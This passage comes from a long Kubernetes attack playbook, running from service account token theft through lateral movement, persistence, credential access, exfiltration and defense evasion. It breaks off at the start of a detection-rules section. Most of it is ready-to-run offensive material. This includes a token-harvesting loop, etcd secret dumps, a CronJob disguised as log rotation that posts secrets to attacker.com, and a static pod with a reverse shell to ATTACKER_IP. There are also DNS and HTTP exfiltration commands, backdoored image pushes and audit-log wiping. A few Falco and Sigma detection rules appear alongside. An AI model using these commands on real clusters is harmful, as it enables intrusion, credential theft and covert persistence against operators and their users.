  cat "$f" 2>/dev/null
done

4.8 Service Account Token Theft

# Default mount point in every pod (unless automount disabled)
cat /var/run/secrets/kubernetes.io/serviceaccount/token
cat /var/run/secrets/kubernetes.io/serviceaccount/ca.crt
cat /var/run/secrets/kubernetes.io/serviceaccount/namespace

# Decode JWT to see identity and expiry
TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
echo $TOKEN | cut -d. -f2 | base64 -d 2>/dev/null | python3 -m json.tool

# Use the token
export APISERVER=https://kubernetes.default.svc
curl -k -H "Authorization: Bearer $TOKEN" $APISERVER/api/v1/namespaces

# kubectl shorthand
kubectl --token=$TOKEN --server=$APISERVER --insecure-skip-tls-verify auth can-i --list

# From host: harvest all tokens on node
find /var/lib/kubelet/pods/ -name token -type l 2>/dev/null | while read tp; do
  tok=$(cat "$tp" 2>/dev/null)
  if [ -n "$tok" ]; then
    sub=$(echo "$tok" | cut -d. -f2 | base64 -d 2>/dev/null | python3 -c \
      "import sys,json;d=json.load(sys.stdin);print(d.get('sub','?'))" 2>/dev/null)
    perms=$(kubectl --token="$tok" auth can-i --list 2>/dev/null | grep -c '\*')
    echo "$sub | wildcards=$perms | $tp"
  fi
done

4.9 Dangerous RBAC Permissions Reference

Permission Escalation Path
create pods Mount host filesystem, use privileged SA, escape to node
create deployments/daemonsets/jobs Same as create pods (indirect pod creation)
create/update clusterrolebindings Bind cluster-admin to self
create/update clusterroles + escalate Create god-mode role
get secrets (cluster-wide) Read all SA tokens, TLS certs, credentials
create serviceaccounts/token Mint tokens for any SA
impersonate users/groups Act as cluster-admin
create certificatesigningrequests + approve Forge client certificates
update/patch nodes Modify node labels to attract sensitive workloads
create/update validatingwebhookconfigurations Disable security admission
create/update mutatingwebhookconfigurations Inject sidecars into all pods
delete events Cover tracks by removing audit evidence

Detection -- Sigma Rule: ClusterRoleBinding Creation:

title: Kubernetes ClusterRoleBinding to cluster-admin Created
id: f8e2d3a1-b4c5-4d6e-8f9a-0b1c2d3e4f5a
status: experimental
description: Detects creation of ClusterRoleBinding referencing cluster-admin role
logsource:
  category: kubernetes_audit
  product: kubernetes
detection:
  selection:
    verb: create
    objectRef.resource: clusterrolebindings
  privilege:
    requestObject.roleRef.name: cluster-admin
  condition: selection and privilege
falsepositives:
  - Legitimate cluster setup or operator installation
  - Helm chart deployments that require cluster-admin
level: critical
tags:
  - attack.t1098.006
  - attack.privilege_escalation

5. Lateral Movement

5.1 Pod-to-Pod via Network Policy Gaps

ATT&CK: T1046 (Network Service Discovery), T1021 (Remote Services)

# Default Kubernetes networking: ALL pods can communicate with ALL other pods
# Check for network policies
kubectl get networkpolicies -A
# If empty -- no restrictions, full lateral movement possible

# Service discovery via DNS
# List all services in all namespaces
nslookup -type=SRV _http._tcp.default.svc.cluster.local
dig +short SRV *.*.svc.cluster.local

# Enumerate services via environment variables (legacy)
env | grep -i _SERVICE_HOST
env | grep -i _SERVICE_PORT

# Enumerate via DNS brute-force
for ns in default kube-system monitoring logging; do
  for svc in api web db redis postgres mysql elasticsearch kibana grafana prometheus; do
    result=$(nslookup $svc.$ns.svc.cluster.local 2>/dev/null | grep Address | tail -1)
    [ -n "$result" ] && echo "$svc.$ns: $result"
  done
done

# Port scan discovered pods
# Get pod CIDR
kubectl get nodes -o jsonpath='{.items[*].spec.podCIDR}'
# Scan
nmap -sT -p 80,443,3306,5432,6379,8080,8443,9200,27017 [POD_CIDR]

# Reach any service directly (bypassing ingress controls)
curl http://10.244.1.15:8080/admin
curl http://internal-api.production.svc.cluster.local/v1/users

5.2 Service Account Hopping

# If you can exec into pods or access the kubelet API,
# you can steal SA tokens from other pods and pivot

# Via kubelet API (if anonymous auth enabled)
curl -k https://[NODE_IP]:10250/runningpods/ | jq '.items[].metadata.name'

# Exec into another pod and steal its token
curl -k -X POST "https://[NODE_IP]:10250/run/production/api-server-xyz/api" \
  -d "cmd=cat /var/run/secrets/kubernetes.io/serviceaccount/token"

# Via kubectl (if you have exec permissions in target namespace)
kubectl exec -n production api-server-xyz -- \
  cat /var/run/secrets/kubernetes.io/serviceaccount/token

# Test stolen token privileges
STOLEN_TOKEN="eyJhbG..."
kubectl --token=$STOLEN_TOKEN auth can-i --list
kubectl --token=$STOLEN_TOKEN get secrets -n production

5.3 etcd Direct Access

# If you can reach etcd (from compromised control-plane node or network access)
# etcd contains ALL cluster state -- secrets, configs, RBAC, everything

# Check connectivity
curl -k https://[ETCD_IP]:2379/version

# With etcd certificates (from control-plane node):
ETCDCTL_API=3 etcdctl \
  --endpoints=https://[ETCD_IP]:2379 \
  --cert=/etc/kubernetes/pki/etcd/peer.crt \
  --key=/etc/kubernetes/pki/etcd/peer.key \
  --cacert=/etc/kubernetes/pki/etcd/ca.crt \
  get / --prefix --keys-only | head -50

# Dump all secrets
ETCDCTL_API=3 etcdctl \
  --endpoints=https://[ETCD_IP]:2379 \
  --cert=/etc/kubernetes/pki/etcd/peer.crt \
  --key=/etc/kubernetes/pki/etcd/peer.key \
  --cacert=/etc/kubernetes/pki/etcd/ca.crt \
  get /registry/secrets --prefix

# Extract SA tokens from etcd database file (no etcdctl needed)
strings /var/lib/etcd/member/snap/db | grep eyJhbGciOiJ

# Targeted secret extraction
ETCDCTL_API=3 etcdctl get /registry/secrets/kube-system/[SECRET_NAME] \
  --endpoints=https://[ETCD_IP]:2379 \
  --cert=/etc/kubernetes/pki/etcd/peer.crt \
  --key=/etc/kubernetes/pki/etcd/peer.key \
  --cacert=/etc/kubernetes/pki/etcd/ca.crt

# Write to etcd (create a cluster-admin binding directly)
# This bypasses ALL admission controllers and RBAC checks
ETCDCTL_API=3 etcdctl put /registry/clusterrolebindings/pwned \
  '[serialized ClusterRoleBinding protobuf]' \
  --endpoints=https://[ETCD_IP]:2379 ...

5.4 Cloud Metadata from Pods

# AWS IMDSv1 (no authentication required)
curl -s http://169.254.169.254/latest/meta-data/
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/
ROLE=$(curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/)
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/$ROLE

# AWS IMDSv2 (requires token -- still accessible from pods unless blocked)
TOKEN=$(curl -s -X PUT "http://169.254.169.254/latest/api/token" \
  -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
curl -s -H "X-aws-ec2-metadata-token: $TOKEN" \
  http://169.254.169.254/latest/meta-data/iam/security-credentials/

# GCP metadata
curl -s -H "Metadata-Flavor: Google" \
  http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
curl -s -H "Metadata-Flavor: Google" \
  http://metadata.google.internal/computeMetadata/v1/project/project-id
curl -s -H "Metadata-Flavor: Google" \
  http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/scopes

# Azure IMDS
curl -s -H "Metadata:true" \
  "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"
curl -s -H "Metadata:true" \
  "http://169.254.169.254/metadata/instance?api-version=2021-02-01"

# Use stolen cloud credentials to access other services
# AWS: use AccessKeyId/SecretAccessKey/Token for S3, EC2, IAM
# GCP: use access_token for GCS, Compute, IAM
# Azure: use access_token for ARM, Key Vault, Storage

5.5 CoreDNS Poisoning

# If you can modify the CoreDNS ConfigMap:
kubectl -n kube-system get configmap coredns -o yaml

# Edit to add rewrite rules
kubectl -n kube-system edit configmap coredns
# Add under the Corefile section:
#   rewrite name api.production.svc.cluster.local attacker-pod.default.svc.cluster.local

# Or add a custom zone file for MITM:
# file /etc/coredns/custom.db example.com {
#   reload 10s
# }

# Restart CoreDNS to apply
kubectl -n kube-system rollout restart deployment coredns

5.6 ARP Spoofing from hostNetwork Pod

# From a pod with hostNetwork: true
apt update && apt install -y dsniff tcpdump

# ARP spoof to intercept traffic between pods
arpspoof -i eth0 -t [TARGET_POD_IP] [GATEWAY_IP]
arpspoof -i eth0 -t [GATEWAY_IP] [TARGET_POD_IP]

# Capture intercepted traffic
tcpdump -ni eth0 -s0 -w captured.pcap
# Look for bearer tokens, API keys, database credentials
tcpdump -ni eth0 -s0 -A | grep -i "authorization\|bearer\|password\|token"

5.7 Kubelet API for Cross-Pod Execution

# Kubelet API allows exec into ANY pod on the node
# Ports: 10250 (authenticated), 10255 (read-only, deprecated)

# List all pods on the node
curl -k https://[NODE_IP]:10250/pods | jq '.items[].metadata | {name, namespace}'

# Execute commands in any pod
curl -k -X POST "https://[NODE_IP]:10250/run/[NS]/[POD]/[CONTAINER]" \
  -d "cmd=cat /var/run/secrets/kubernetes.io/serviceaccount/token"

# Get container logs
curl -k "https://[NODE_IP]:10250/containerLogs/[NS]/[POD]/[CONTAINER]?tail=100"

# Websocket exec (for interactive shells)
wscat -c "wss://[NODE_IP]:10250/exec/[NS]/[POD]/[CONTAINER]?command=/bin/sh&input=1&output=1&tty=1" \
  --no-check

6. Persistence

6.1 Admission Webhook Backdoors

ATT&CK: T1098 (Account Manipulation), T1546 (Event Triggered Execution)

Mutating admission webhooks intercept every API request and can modify objects before they are persisted. A malicious webhook can inject sidecars, modify security contexts, or exfiltrate data from every created resource.

# Malicious MutatingWebhookConfiguration
# Injects a sidecar into every new pod
apiVersion: admissionregistration.k8s.io/v1
kind: MutatingWebhookConfiguration
metadata:
  name: pod-injector
webhooks:
- name: inject.attacker.io
  admissionReviewVersions: ["v1"]
  sideEffects: None
  clientConfig:
    url: "https://attacker-webhook.default.svc:443/mutate"
    # OR for external:
    # url: "https://attacker.com/webhook/mutate"
  rules:
  - operations: ["CREATE"]
    apiGroups: [""]
    apiVersions: ["v1"]
    resources: ["pods"]
  namespaceSelector:
    matchExpressions:
    - key: kubernetes.io/metadata.name
      operator: NotIn
      values: ["kube-system"]  # Avoid breaking system pods
  failurePolicy: Ignore  # Fail open so webhook outage doesn't block cluster
# Webhook server that injects a sidecar into every pod
# This is the server that runs at attacker-webhook.default.svc
from flask import Flask, request, jsonify
import base64, json, copy

app = Flask(__name__)

@app.route('/mutate', methods=['POST'])
def mutate():
    review = request.get_json()
    pod = review['request']['object']

    # Inject sidecar container
    sidecar = {
        "name": "monitoring-agent",  # Innocent-looking name
        "image": "attacker/exfil:latest",
        "env": [{"name": "TARGET_TOKEN", "value": ""}],
        "volumeMounts": [{
            "name": "sa-token",
            "mountPath": "/var/run/secrets/kubernetes.io/serviceaccount",
            "readOnly": True
        }],
        "resources": {"limits": {"cpu": "50m", "memory": "64Mi"}}
    }

    patch = [{"op": "add", "path": "/spec/containers/-", "value": sidecar}]

    return jsonify({
        "apiVersion": "admission.k8s.io/v1",
        "kind": "AdmissionReview",
        "response": {
            "uid": review['request']['uid'],
            "allowed": True,
            "patchType": "JSONPatch",
            "patch": base64.b64encode(json.dumps(patch).encode()).decode()
        }
    })

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=443, ssl_context=('cert.pem', 'key.pem'))

Detection -- Falco Rule:

- rule: Mutating Webhook Configuration Modified
  desc: Detect creation or modification of mutating webhook configurations
  condition: >
    kevt and
    (kcreate or kupdate) and
    ka.target.resource = "mutatingwebhookconfigurations"
  output: >
    Mutating webhook configuration changed
    (user=%ka.user.name verb=%ka.verb name=%ka.target.name)
  priority: HIGH
  tags: [k8s, persistence, T1098]

6.2 CronJob Persistence

ATT&CK: T1053.007 (Container Orchestration Job)

# CronJob that runs every 5 minutes, exfiltrates secrets
apiVersion: batch/v1
kind: CronJob
metadata:
  name: log-rotation  # Innocent name
  namespace: kube-system
spec:
  schedule: "*/5 * * * *"
  successfulJobsHistoryLimit: 0  # Don't keep completed job records
  failedJobsHistoryLimit: 0
  jobTemplate:
    spec:
      template:
        spec:
          serviceAccountName: default
          containers:
          - name: rotate
            image: curlimages/curl
            command:
            - /bin/sh
            - -c
            - |
              TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
              SECRETS=$(curl -sk -H "Authorization: Bearer $TOKEN" \
                https://kubernetes.default.svc/api/v1/secrets)
              curl -X POST https://attacker.com/exfil -d "$SECRETS"
          restartPolicy: Never
# Create the CronJob
kubectl apply -f cronjob-persistence.yaml

# Verify it's running
kubectl get cronjobs -n kube-system
kubectl get jobs -n kube-system

# Stealthy: name it like a legitimate job
# Good camouflage names: log-rotation, cert-renewal, metrics-collector, cache-cleaner

6.3 Static Pod Injection

ATT&CK: T1543.005 (Container Service)

Static pods are managed directly by the kubelet, not the API server. They bypass ALL admission controllers.

# Requires write access to the kubelet's static pod manifest directory
# Default: /etc/kubernetes/manifests/

# Create a static pod backdoor
cat > /etc/kubernetes/manifests/kube-metrics-collector.yaml << 'EOF'
apiVersion: v1
kind: Pod
metadata:
  name: kube-metrics-collector
  namespace: kube-system
  labels:
    component: metrics
    tier: monitoring
spec:
  hostNetwork: true
  hostPID: true
  containers:
  - name: collector
    image: ubuntu:22.04
    command:
    - bash
    - -c
    - |
      while true; do
        # Reverse shell beacon
        bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1 || true
        sleep 300
      done
    securityContext:
      privileged: true
    volumeMounts:
    - mountPath: /host
      name: hostroot
  volumes:
  - name: hostroot
    hostPath:
      path: /
EOF

# kubelet automatically creates this pod
# It survives kubectl delete (kubelet recreates it immediately)
# Only removable by deleting the manifest file from the node

Key properties of static pods:

  • Not managed by API server (no Deployment/ReplicaSet)
  • Bypass admission controllers (OPA, Kyverno, Pod Security)
  • Survive kubectl delete (kubelet recreates them)
  • Visible in API as mirror pods but cannot be modified via API
  • Only removed by deleting the manifest file on the node

6.4 DaemonSet Backdoor

# DaemonSet runs on EVERY node -- one pod per node for full coverage
apiVersion: apps/v1
kind: DaemonSet
metadata:
  name: node-monitor  # Camouflage name
  namespace: kube-system
  labels:
    k8s-app: node-monitor
spec:
  selector:
    matchLabels:
      k8s-app: node-monitor
  template:
    metadata:
      labels:
        k8s-app: node-monitor
    spec:
      hostNetwork: true
      hostPID: true
      tolerations:
      - operator: Exists  # Run on ALL nodes including masters
      containers:
      - name: monitor
        image: ubuntu:22.04
        command: ["bash", "-c", "while true; do sleep 3600; done"]
        securityContext:
          privileged: true
        volumeMounts:
        - mountPath: /host
          name: root
      volumes:
      - name: root
        hostPath:
          path: /

6.5 Mutating Webhook for Persistent Injection

# Webhook that modifies EVERY deployment to include a backdoor init container
# This persists even if you delete individual pods -- new ones get re-infected
apiVersion: admissionregistration.k8s.io/v1
kind: MutatingWebhookConfiguration
metadata:
  name: cert-injector  # Disguised as certificate injection
webhooks:
- name: certs.internal.io
  admissionReviewVersions: ["v1"]
  sideEffects: None
  clientConfig:
    service:
      name: cert-injector
      namespace: kube-system
      path: /inject
  rules:
  - operations: ["CREATE", "UPDATE"]
    apiGroups: ["apps"]
    apiVersions: ["v1"]
    resources: ["deployments", "daemonsets", "statefulsets"]
  failurePolicy: Ignore

6.6 Container Image Backdoor

# Modify an existing image in the registry to include a backdoor

# Pull the legitimate image
docker pull registry.internal.com/app:v2.1.0

# Add backdoor layer
cat > Dockerfile.backdoor << 'EOF'
FROM registry.internal.com/app:v2.1.0
COPY backdoor.sh /usr/local/bin/.health-check
RUN chmod +x /usr/local/bin/.health-check
# Modify entrypoint to run backdoor in background
ENTRYPOINT ["/bin/sh", "-c", "/usr/local/bin/.health-check & exec /original-entrypoint"]
EOF

# Push with the same tag
docker build -f Dockerfile.backdoor -t registry.internal.com/app:v2.1.0 .
docker push registry.internal.com/app:v2.1.0

# Next restart or scale event pulls the backdoored image

6.7 Shadow API Server

# CDK tool can deploy a shadow API server
cdk run k8s-shadow-apiserver

# Manual: create a pod that serves as a secondary API endpoint
# that accepts any authentication and proxies to the real API server
# with a stolen high-privilege token

7. Credential Access

7.1 Secrets via Kubernetes API

ATT&CK: T1528 (Steal Application Access Token)

# List all secrets (requires get secrets permission)
kubectl get secrets -A
kubectl get secrets -A -o json

# Decode secrets
kubectl get secret [NAME] -n [NS] -o jsonpath='{.data}' | \
  python3 -c "import sys,json,base64; [print(f'{k}: {base64.b64decode(v).decode()}') for k,v in json.loads(sys.stdin.read()).items()]"

# Bulk extraction script
kubectl get secrets -A -o json | python3 -c "
import json,sys,base64
data = json.load(sys.stdin)
for item in data['items']:
  ns = item['metadata']['namespace']
  name = item['metadata']['name']
  kind = item.get('type','')
  print(f'=== {ns}/{name} ({kind}) ===')
  for k,v in item.get('data',{}).items():
    try: print(f'  {k}: {base64.b64decode(v).decode()[:200]}')
    except: print(f'  {k}: [binary data]')
"

# Target high-value secrets
kubectl get secrets -A -o json | jq '
  .items[] | select(
    .type == "kubernetes.io/tls" or
    .type == "Opaque" or
    .type == "kubernetes.io/dockerconfigjson"
  ) | {namespace: .metadata.namespace, name: .metadata.name, type: .type}'

7.2 Secrets in etcd

# Direct etcd access bypasses RBAC entirely

# Check encryption at rest
cat /etc/kubernetes/manifests/kube-apiserver.yaml | grep encryption-provider-config
cat /etc/kubernetes/encryption-config.yaml

# If using identity provider (NOT encrypted):
# providers:
# - identity: {}    <-- secrets stored in plaintext

# Dump all secrets from etcd
ETCDCTL_API=3 etcdctl \
  --endpoints=https://127.0.0.1:2379 \
  --cert=/etc/kubernetes/pki/etcd/peer.crt \
  --key=/etc/kubernetes/pki/etcd/peer.key \
  --cacert=/etc/kubernetes/pki/etcd/ca.crt \
  get /registry/secrets --prefix --print-value-only

# From etcd database file (offline, no etcdctl)
strings /var/lib/etcd/member/snap/db | grep -A5 "password\|secret\|token"

7.3 Mounted Secrets in Pods

# Secrets mounted as volumes
find / -name "*.key" -o -name "*.pem" -o -name "*.crt" 2>/dev/null
find / -path "*/secrets/*" 2>/dev/null
find / -path "*/.dockerconfigjson" 2>/dev/null

# Secrets as environment variables (visible in /proc)
env | grep -iE "password|secret|key|token|api_key|credential"
cat /proc/self/environ | tr '\0' '\n' | grep -iE "password|secret|key|token"

# From host with hostPID: steal env vars from all pods
for e in $(ls /proc/*/environ 2>/dev/null); do
  xargs -0 -L1 -a "$e" 2>/dev/null | grep -iE "password|secret|key|token|aws"
done

7.4 Cloud IMDS Credential Theft

# AWS -- node IAM role credentials
ROLE=$(curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/)
CREDS=$(curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/$ROLE)
echo $CREDS | jq '{AccessKeyId, SecretAccessKey, Token, Expiration}'

# Use stolen AWS credentials
export AWS_ACCESS_KEY_ID=$(echo $CREDS | jq -r .AccessKeyId)
export AWS_SECRET_ACCESS_KEY=$(echo $CREDS | jq -r .SecretAccessKey)
export AWS_SESSION_TOKEN=$(echo $CREDS | jq -r .Token)
aws sts get-caller-identity
aws s3 ls
aws ec2 describe-instances
aws iam list-roles

# GCP -- default service account token
TOKEN=$(curl -s -H "Metadata-Flavor: Google" \
  http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token \
  | jq -r .access_token)
# Use with gcloud or API calls
curl -H "Authorization: Bearer $TOKEN" \
  "https://www.googleapis.com/storage/v1/b?project=$(curl -s -H 'Metadata-Flavor: Google' \
  http://metadata.google.internal/computeMetadata/v1/project/project-id)"

# Azure -- managed identity token
TOKEN=$(curl -s -H "Metadata:true" \
  "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/" \
  | jq -r .access_token)
# Use with az CLI or REST API
curl -H "Authorization: Bearer $TOKEN" \
  "https://management.azure.com/subscriptions?api-version=2020-01-01"

7.5 IRSA / Workload Identity Abuse

# AWS IRSA (IAM Roles for Service Accounts)
# Pods get a projected SA token that can be exchanged for AWS credentials

# Check if IRSA is configured
env | grep AWS_ROLE_ARN
env | grep AWS_WEB_IDENTITY_TOKEN_FILE
cat $AWS_WEB_IDENTITY_TOKEN_FILE

# The token is a K8s SA token with an audience claim for STS
# AWS STS trusts the K8s OIDC provider to issue tokens for this role
# Attack: if you can create pods with the annotated service account,
# you get the AWS IAM role

# Check SA annotations
kubectl get sa -A -o json | jq '
  .items[] | select(.metadata.annotations["eks.amazonaws.com/role-arn"] != null) |
  {namespace: .metadata.namespace, name: .metadata.name,
   role: .metadata.annotations["eks.amazonaws.com/role-arn"]}'

# Create a pod with the target SA to steal AWS credentials
kubectl run steal --image=amazonlinux \
  --serviceaccount=target-sa -n target-ns \
  --command -- sleep infinity
kubectl exec -it steal -n target-ns -- aws sts get-caller-identity

# GCP Workload Identity
# Check for WI annotation
kubectl get sa -A -o json | jq '
  .items[] | select(.metadata.annotations["iam.gke.io/gcp-service-account"] != null) |
  {namespace: .metadata.namespace, name: .metadata.name,
   gsa: .metadata.annotations["iam.gke.io/gcp-service-account"]}'

# Azure Workload Identity (AAD Pod Identity)
kubectl get azureidentities -A
kubectl get azureidentitybindings -A

7.6 Container Image Layer Secrets

# Secrets may be baked into image layers
docker history [IMAGE] --no-trunc
docker inspect [IMAGE] | jq '.[].Config.Env'

# Extract and search all layers
docker save [IMAGE] -o image.tar
tar xf image.tar
for layer in */layer.tar; do
  echo "=== $layer ==="
  tar tf "$layer" 2>/dev/null | grep -iE "\.env|\.key|\.pem|config|secret|password|credential"
done

# Search layer contents
for layer in */layer.tar; do
  tar xf "$layer" -C /tmp/layer_extract 2>/dev/null
  grep -rl "password\|secret\|api_key\|token" /tmp/layer_extract/ 2>/dev/null
  rm -rf /tmp/layer_extract/*
done

8. Data Exfiltration

8.1 Volume Mount Access

ATT&CK: T1005 (Data from Local System)

# If a pod has PersistentVolume mounts, access data directly
df -h  # List mounted volumes
ls -la /data /mnt /vol /persistent 2>/dev/null

# From a hostPath pod: access ALL PersistentVolumes on the node
find /host/var/lib/kubelet/pods -name "*.json" -path "*/volumes/*" 2>/dev/null
ls /host/var/lib/kubelet/pods/*/volumes/kubernetes.io~*/ 2>/dev/null

# Access NFS/EBS/GCE PD volumes
mount | grep -E "nfs|ebs|gce|azure"

# Copy data from PV to exfil
tar czf /tmp/exfil.tar.gz /data/
curl -X POST -F "file=@/tmp/exfil.tar.gz" https://attacker.com/upload

8.2 Sidecar Injection for Data Capture

# Inject a sidecar that mirrors application traffic
# Via mutating webhook or direct pod spec modification
apiVersion: v1
kind: Pod
metadata:
  name: app-with-exfil
spec:
  containers:
  - name: app
    image: myapp:latest
    ports:
    - containerPort: 8080
  - name: log-agent  # Disguised sidecar
    image: attacker/exfil-agent:latest
    env:
    - name: EXFIL_ENDPOINT
      value: "https://attacker.com/collect"
    volumeMounts:
    - name: shared-data
      mountPath: /app-data
    - name: sa-token
      mountPath: /var/run/secrets/kubernetes.io/serviceaccount
      readOnly: true
  volumes:
  - name: shared-data
    emptyDir: {}
  - name: sa-token
    projected:
      sources:
      - serviceAccountToken:
          path: token

8.3 DNS Exfiltration

# Encode data into DNS queries -- bypasses most network policies
# NetworkPolicy does not filter DNS traffic to CoreDNS by default

# Simple DNS exfil
data=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token | base64 | tr '+/' '-_' | fold -w 60)
for chunk in $data; do
  nslookup $chunk.exfil.attacker.com
done

# Faster: use dig with encoded data
SECRET=$(kubectl get secret db-creds -o jsonpath='{.data.password}')
dig $SECRET.data.attacker.com

# Tool: dnscat2 for tunneling
# From pod:
dnscat2 --dns server=attacker.com,port=53

# iodine for IP-over-DNS tunneling
iodine -f attacker.com

8.4 Container Registry Theft

# Steal images from private registries using imagePullSecrets

# Get registry credentials
kubectl get secrets -A -o json | jq '
  .items[] | select(.type == "kubernetes.io/dockerconfigjson") |
  {ns: .metadata.namespace, name: .metadata.name,
   config: (.data[".dockerconfigjson"] | @base64d | fromjson)}'

# Use stolen credentials to pull proprietary images
REGISTRY_AUTH=$(kubectl get secret regcred -o jsonpath='{.data.\.dockerconfigjson}' | base64 -d)
echo $REGISTRY_AUTH | docker login --username _json_key --password-stdin [REGISTRY]
docker pull [REGISTRY]/proprietary-app:latest

# Exfil the image
docker save [REGISTRY]/proprietary-app:latest | gzip | \
  curl -X POST -H "Content-Type: application/gzip" --data-binary @- https://attacker.com/images

8.5 HTTP/HTTPS Exfiltration via Egress

# If egress is not restricted by NetworkPolicy:
# Direct HTTP exfil
curl -X POST https://attacker.com/exfil \
  -d "$(kubectl get secrets -A -o json | base64)"

# Chunked exfil for large data
tar czf - /data | split -b 1M - /tmp/chunk_
for f in /tmp/chunk_*; do
  curl -X POST -F "file=@$f" https://attacker.com/upload
  rm "$f"
done

# Exfil via cloud storage (using stolen cloud credentials)
aws s3 cp /data/dump.sql s3://attacker-bucket/
gsutil cp /data/dump.sql gs://attacker-bucket/

9. Defense Evasion

9.1 Pod Security Bypass

ATT&CK: T1562.001 (Disable or Modify Tools)

# Pod Security Standards (PSS) enforcement bypass techniques:

# 1. Use namespaces without PSS labels
kubectl get ns --show-labels | grep -v "pod-security"
# Deploy to unlabeled namespaces

# 2. Use resource types that create pods indirectly
# If admission only checks Pods, use CronJobs/Jobs/DaemonSets
# Some webhooks only intercept CREATE on pods, not the controllers

# 3. Ephemeral containers (often not covered by PSS)
kubectl debug -it [POD] --image=ubuntu --target=[CONTAINER]
# Debug containers may bypass security context requirements

# 4. Static pods bypass PSS entirely (see Section 6.3)
# Write to /etc/kubernetes/manifests/ on the node

# 5. Namespace label manipulation (if you can update namespaces)
kubectl label namespace target pod-security.kubernetes.io/enforce=privileged --overwrite

9.2 Admission Controller Evasion

# 1. Check which resources/operations the webhook intercepts
kubectl get validatingwebhookconfigurations -o yaml | grep -A10 "rules:"
kubectl get mutatingwebhookconfigurations -o yaml | grep -A10 "rules:"

# 2. Use resource types not covered by webhooks
# Example: webhook covers pods but not cronjobs
# Create a CronJob that spawns a privileged pod

# 3. Target excluded namespaces
# Webhooks often exclude kube-system
kubectl get mutatingwebhookconfigurations -o json | jq '
  .items[].webhooks[].namespaceSelector'

# 4. Delete or modify the webhook configuration
kubectl delete validatingwebhookconfigurations [NAME]
kubectl delete mutatingwebhookconfigurations [NAME]

# 5. Make the webhook service unreachable (if failurePolicy: Ignore)
# Delete the webhook backend service/deployment
kubectl delete svc [WEBHOOK_SVC] -n [WEBHOOK_NS]
# Now all requests bypass the webhook

# 6. TOCTOU: create a compliant pod, then patch it
kubectl run benign --image=nginx
# Wait for admission...
kubectl patch pod benign --type='json' -p='[
  {"op":"add","path":"/spec/containers/0/securityContext","value":{"privileged":true}}
]'
# Note: this often fails for immutable fields, but works for some

9.3 Log Tampering and Event Deletion

# Delete Kubernetes events to hide tracks
kubectl delete events --all -n [NAMESPACE]
kubectl delete events --field-selector reason=Created -n default

# If you have access to the node:
# Truncate container logs
echo "" > /var/log/containers/[POD_NAME]*.log
echo "" > /var/log/pods/[NAMESPACE]_[POD]_[UID]/[CONTAINER]/*.log

# Clear kubelet logs
echo "" > /var/log/kubelet.log
journalctl --vacuum-time=1s -u kubelet

# Clear audit logs (if stored locally)
echo "" > /var/log/kubernetes/audit/audit.log

# Modify API server audit policy to reduce logging
# (if you can modify kube-apiserver static pod manifest)

9.4 Pod/Container Name Similarity

# Use names that blend in with legitimate system pods
# kube-system namespace naming patterns:
# kube-proxy-xxxxx, coredns-xxxxx, etcd-master, kube-apiserver-master

kubectl run kube-proxy-monitor --image=ubuntu -n kube-system \
  --labels="k8s-app=kube-proxy" -- sleep infinity

# Use legitimate-looking image names
# Instead of: attacker/backdoor:latest
# Use: k8s.gcr.io/metrics-server:v0.6.3 (built from your own Dockerfile)

9.5 Rootless Container Escape Techniques

# Even without privileged: true, certain capabilities enable escape

# CAP_SYS_ADMIN alone
# Allows mount, cgroup manipulation, many kernel operations
# Check current capabilities:
cat /proc/self/status | grep Cap
capsh --decode=$(cat /proc/self/status | grep CapEff | awk '{print $2}')

# CAP_DAC_READ_SEARCH
# Read any file on the host (if combined with hostPath)
# CDK: cdk run cap-dac-read-search /etc/shadow

# CAP_NET_ADMIN + hostNetwork
# ARP spoof, route manipulation, packet capture

# CAP_SYS_PTRACE + hostPID
# Inject into host processes (see Section 3.4)

9.6 Image Build-Time Evasion

# Multi-stage build to hide malicious tools
FROM golang:1.21 AS builder
COPY backdoor.go .
RUN go build -o /backdoor backdoor.go

FROM gcr.io/distroless/static:nonroot
COPY --from=builder /backdoor /usr/local/bin/healthcheck
# Appears clean in image scan -- distroless base, no shell
# Backdoor is a statically compiled Go binary

10. Detection Engineering

10.1 Falco Rules for Kubernetes Attacks

# === Container Escape Detection ===

- rule: Container Escape via nsenter
  desc: Detect nsenter execution indicating container-to-host escape
  condition: >
    spawned_process and
    proc.name = "nsenter" and
    container.id != ""
  output: >
    nsenter executed in container (user=%user.name command=%proc.cmdline
    container=%container.name image=%container.image.repository pid=%proc.pid)
  priority: CRITICAL
  tags: [container, escape, mitre_privilege_escalation, T1611]

- rule: Docker Socket Access from Container
  desc: Detect container accessing Docker socket for potential escape
  condition: >
    container.id != "" and
    (fd.name = "/var/run/docker.sock" or
     fd.name = "/run/containerd/containerd.sock" or
     fd.name = "/var/run/crio/crio.sock") and
    (evt.type in (open, openat, openat2))
  output: >
    Container runtime socket accessed from container
    (user=%user.name command=%proc.cmdline file=%fd.name container=%container.name)
  priority: CRITICAL
  tags: [container, escape, T1611]

- rule: Mount Executed in Container
  desc: Detect mount command in container indicating escape attempt
  condition: >
    spawned_process and
    proc.name = "mount" and
    container.id != ""
  output: >
    Mount command executed in container (user=%user.name command=%proc.cmdline
    container=%container.name image=%container.image.repository)
  priority: HIGH
  tags: [container, escape, T1611]

- rule: Write to Core Pattern File
  desc: Detect modification of core_pattern for container escape
  condition: >
    open_write and
    fd.name = "/proc/sys/kernel/core_pattern" and
    container.id != ""
  output: >
    Core pattern modified from container (user=%user.name command=%proc.cmdline
    container=%container.name)
  priority: CRITICAL
  tags: [container, escape, T1611]

# === Credential Access Detection ===

- rule: Read Sensitive File in Container
  desc: Detect access to sensitive credential files
  condition: >
    open_read and
    container.id != "" and
    (fd.name startswith "/etc/shadow" or
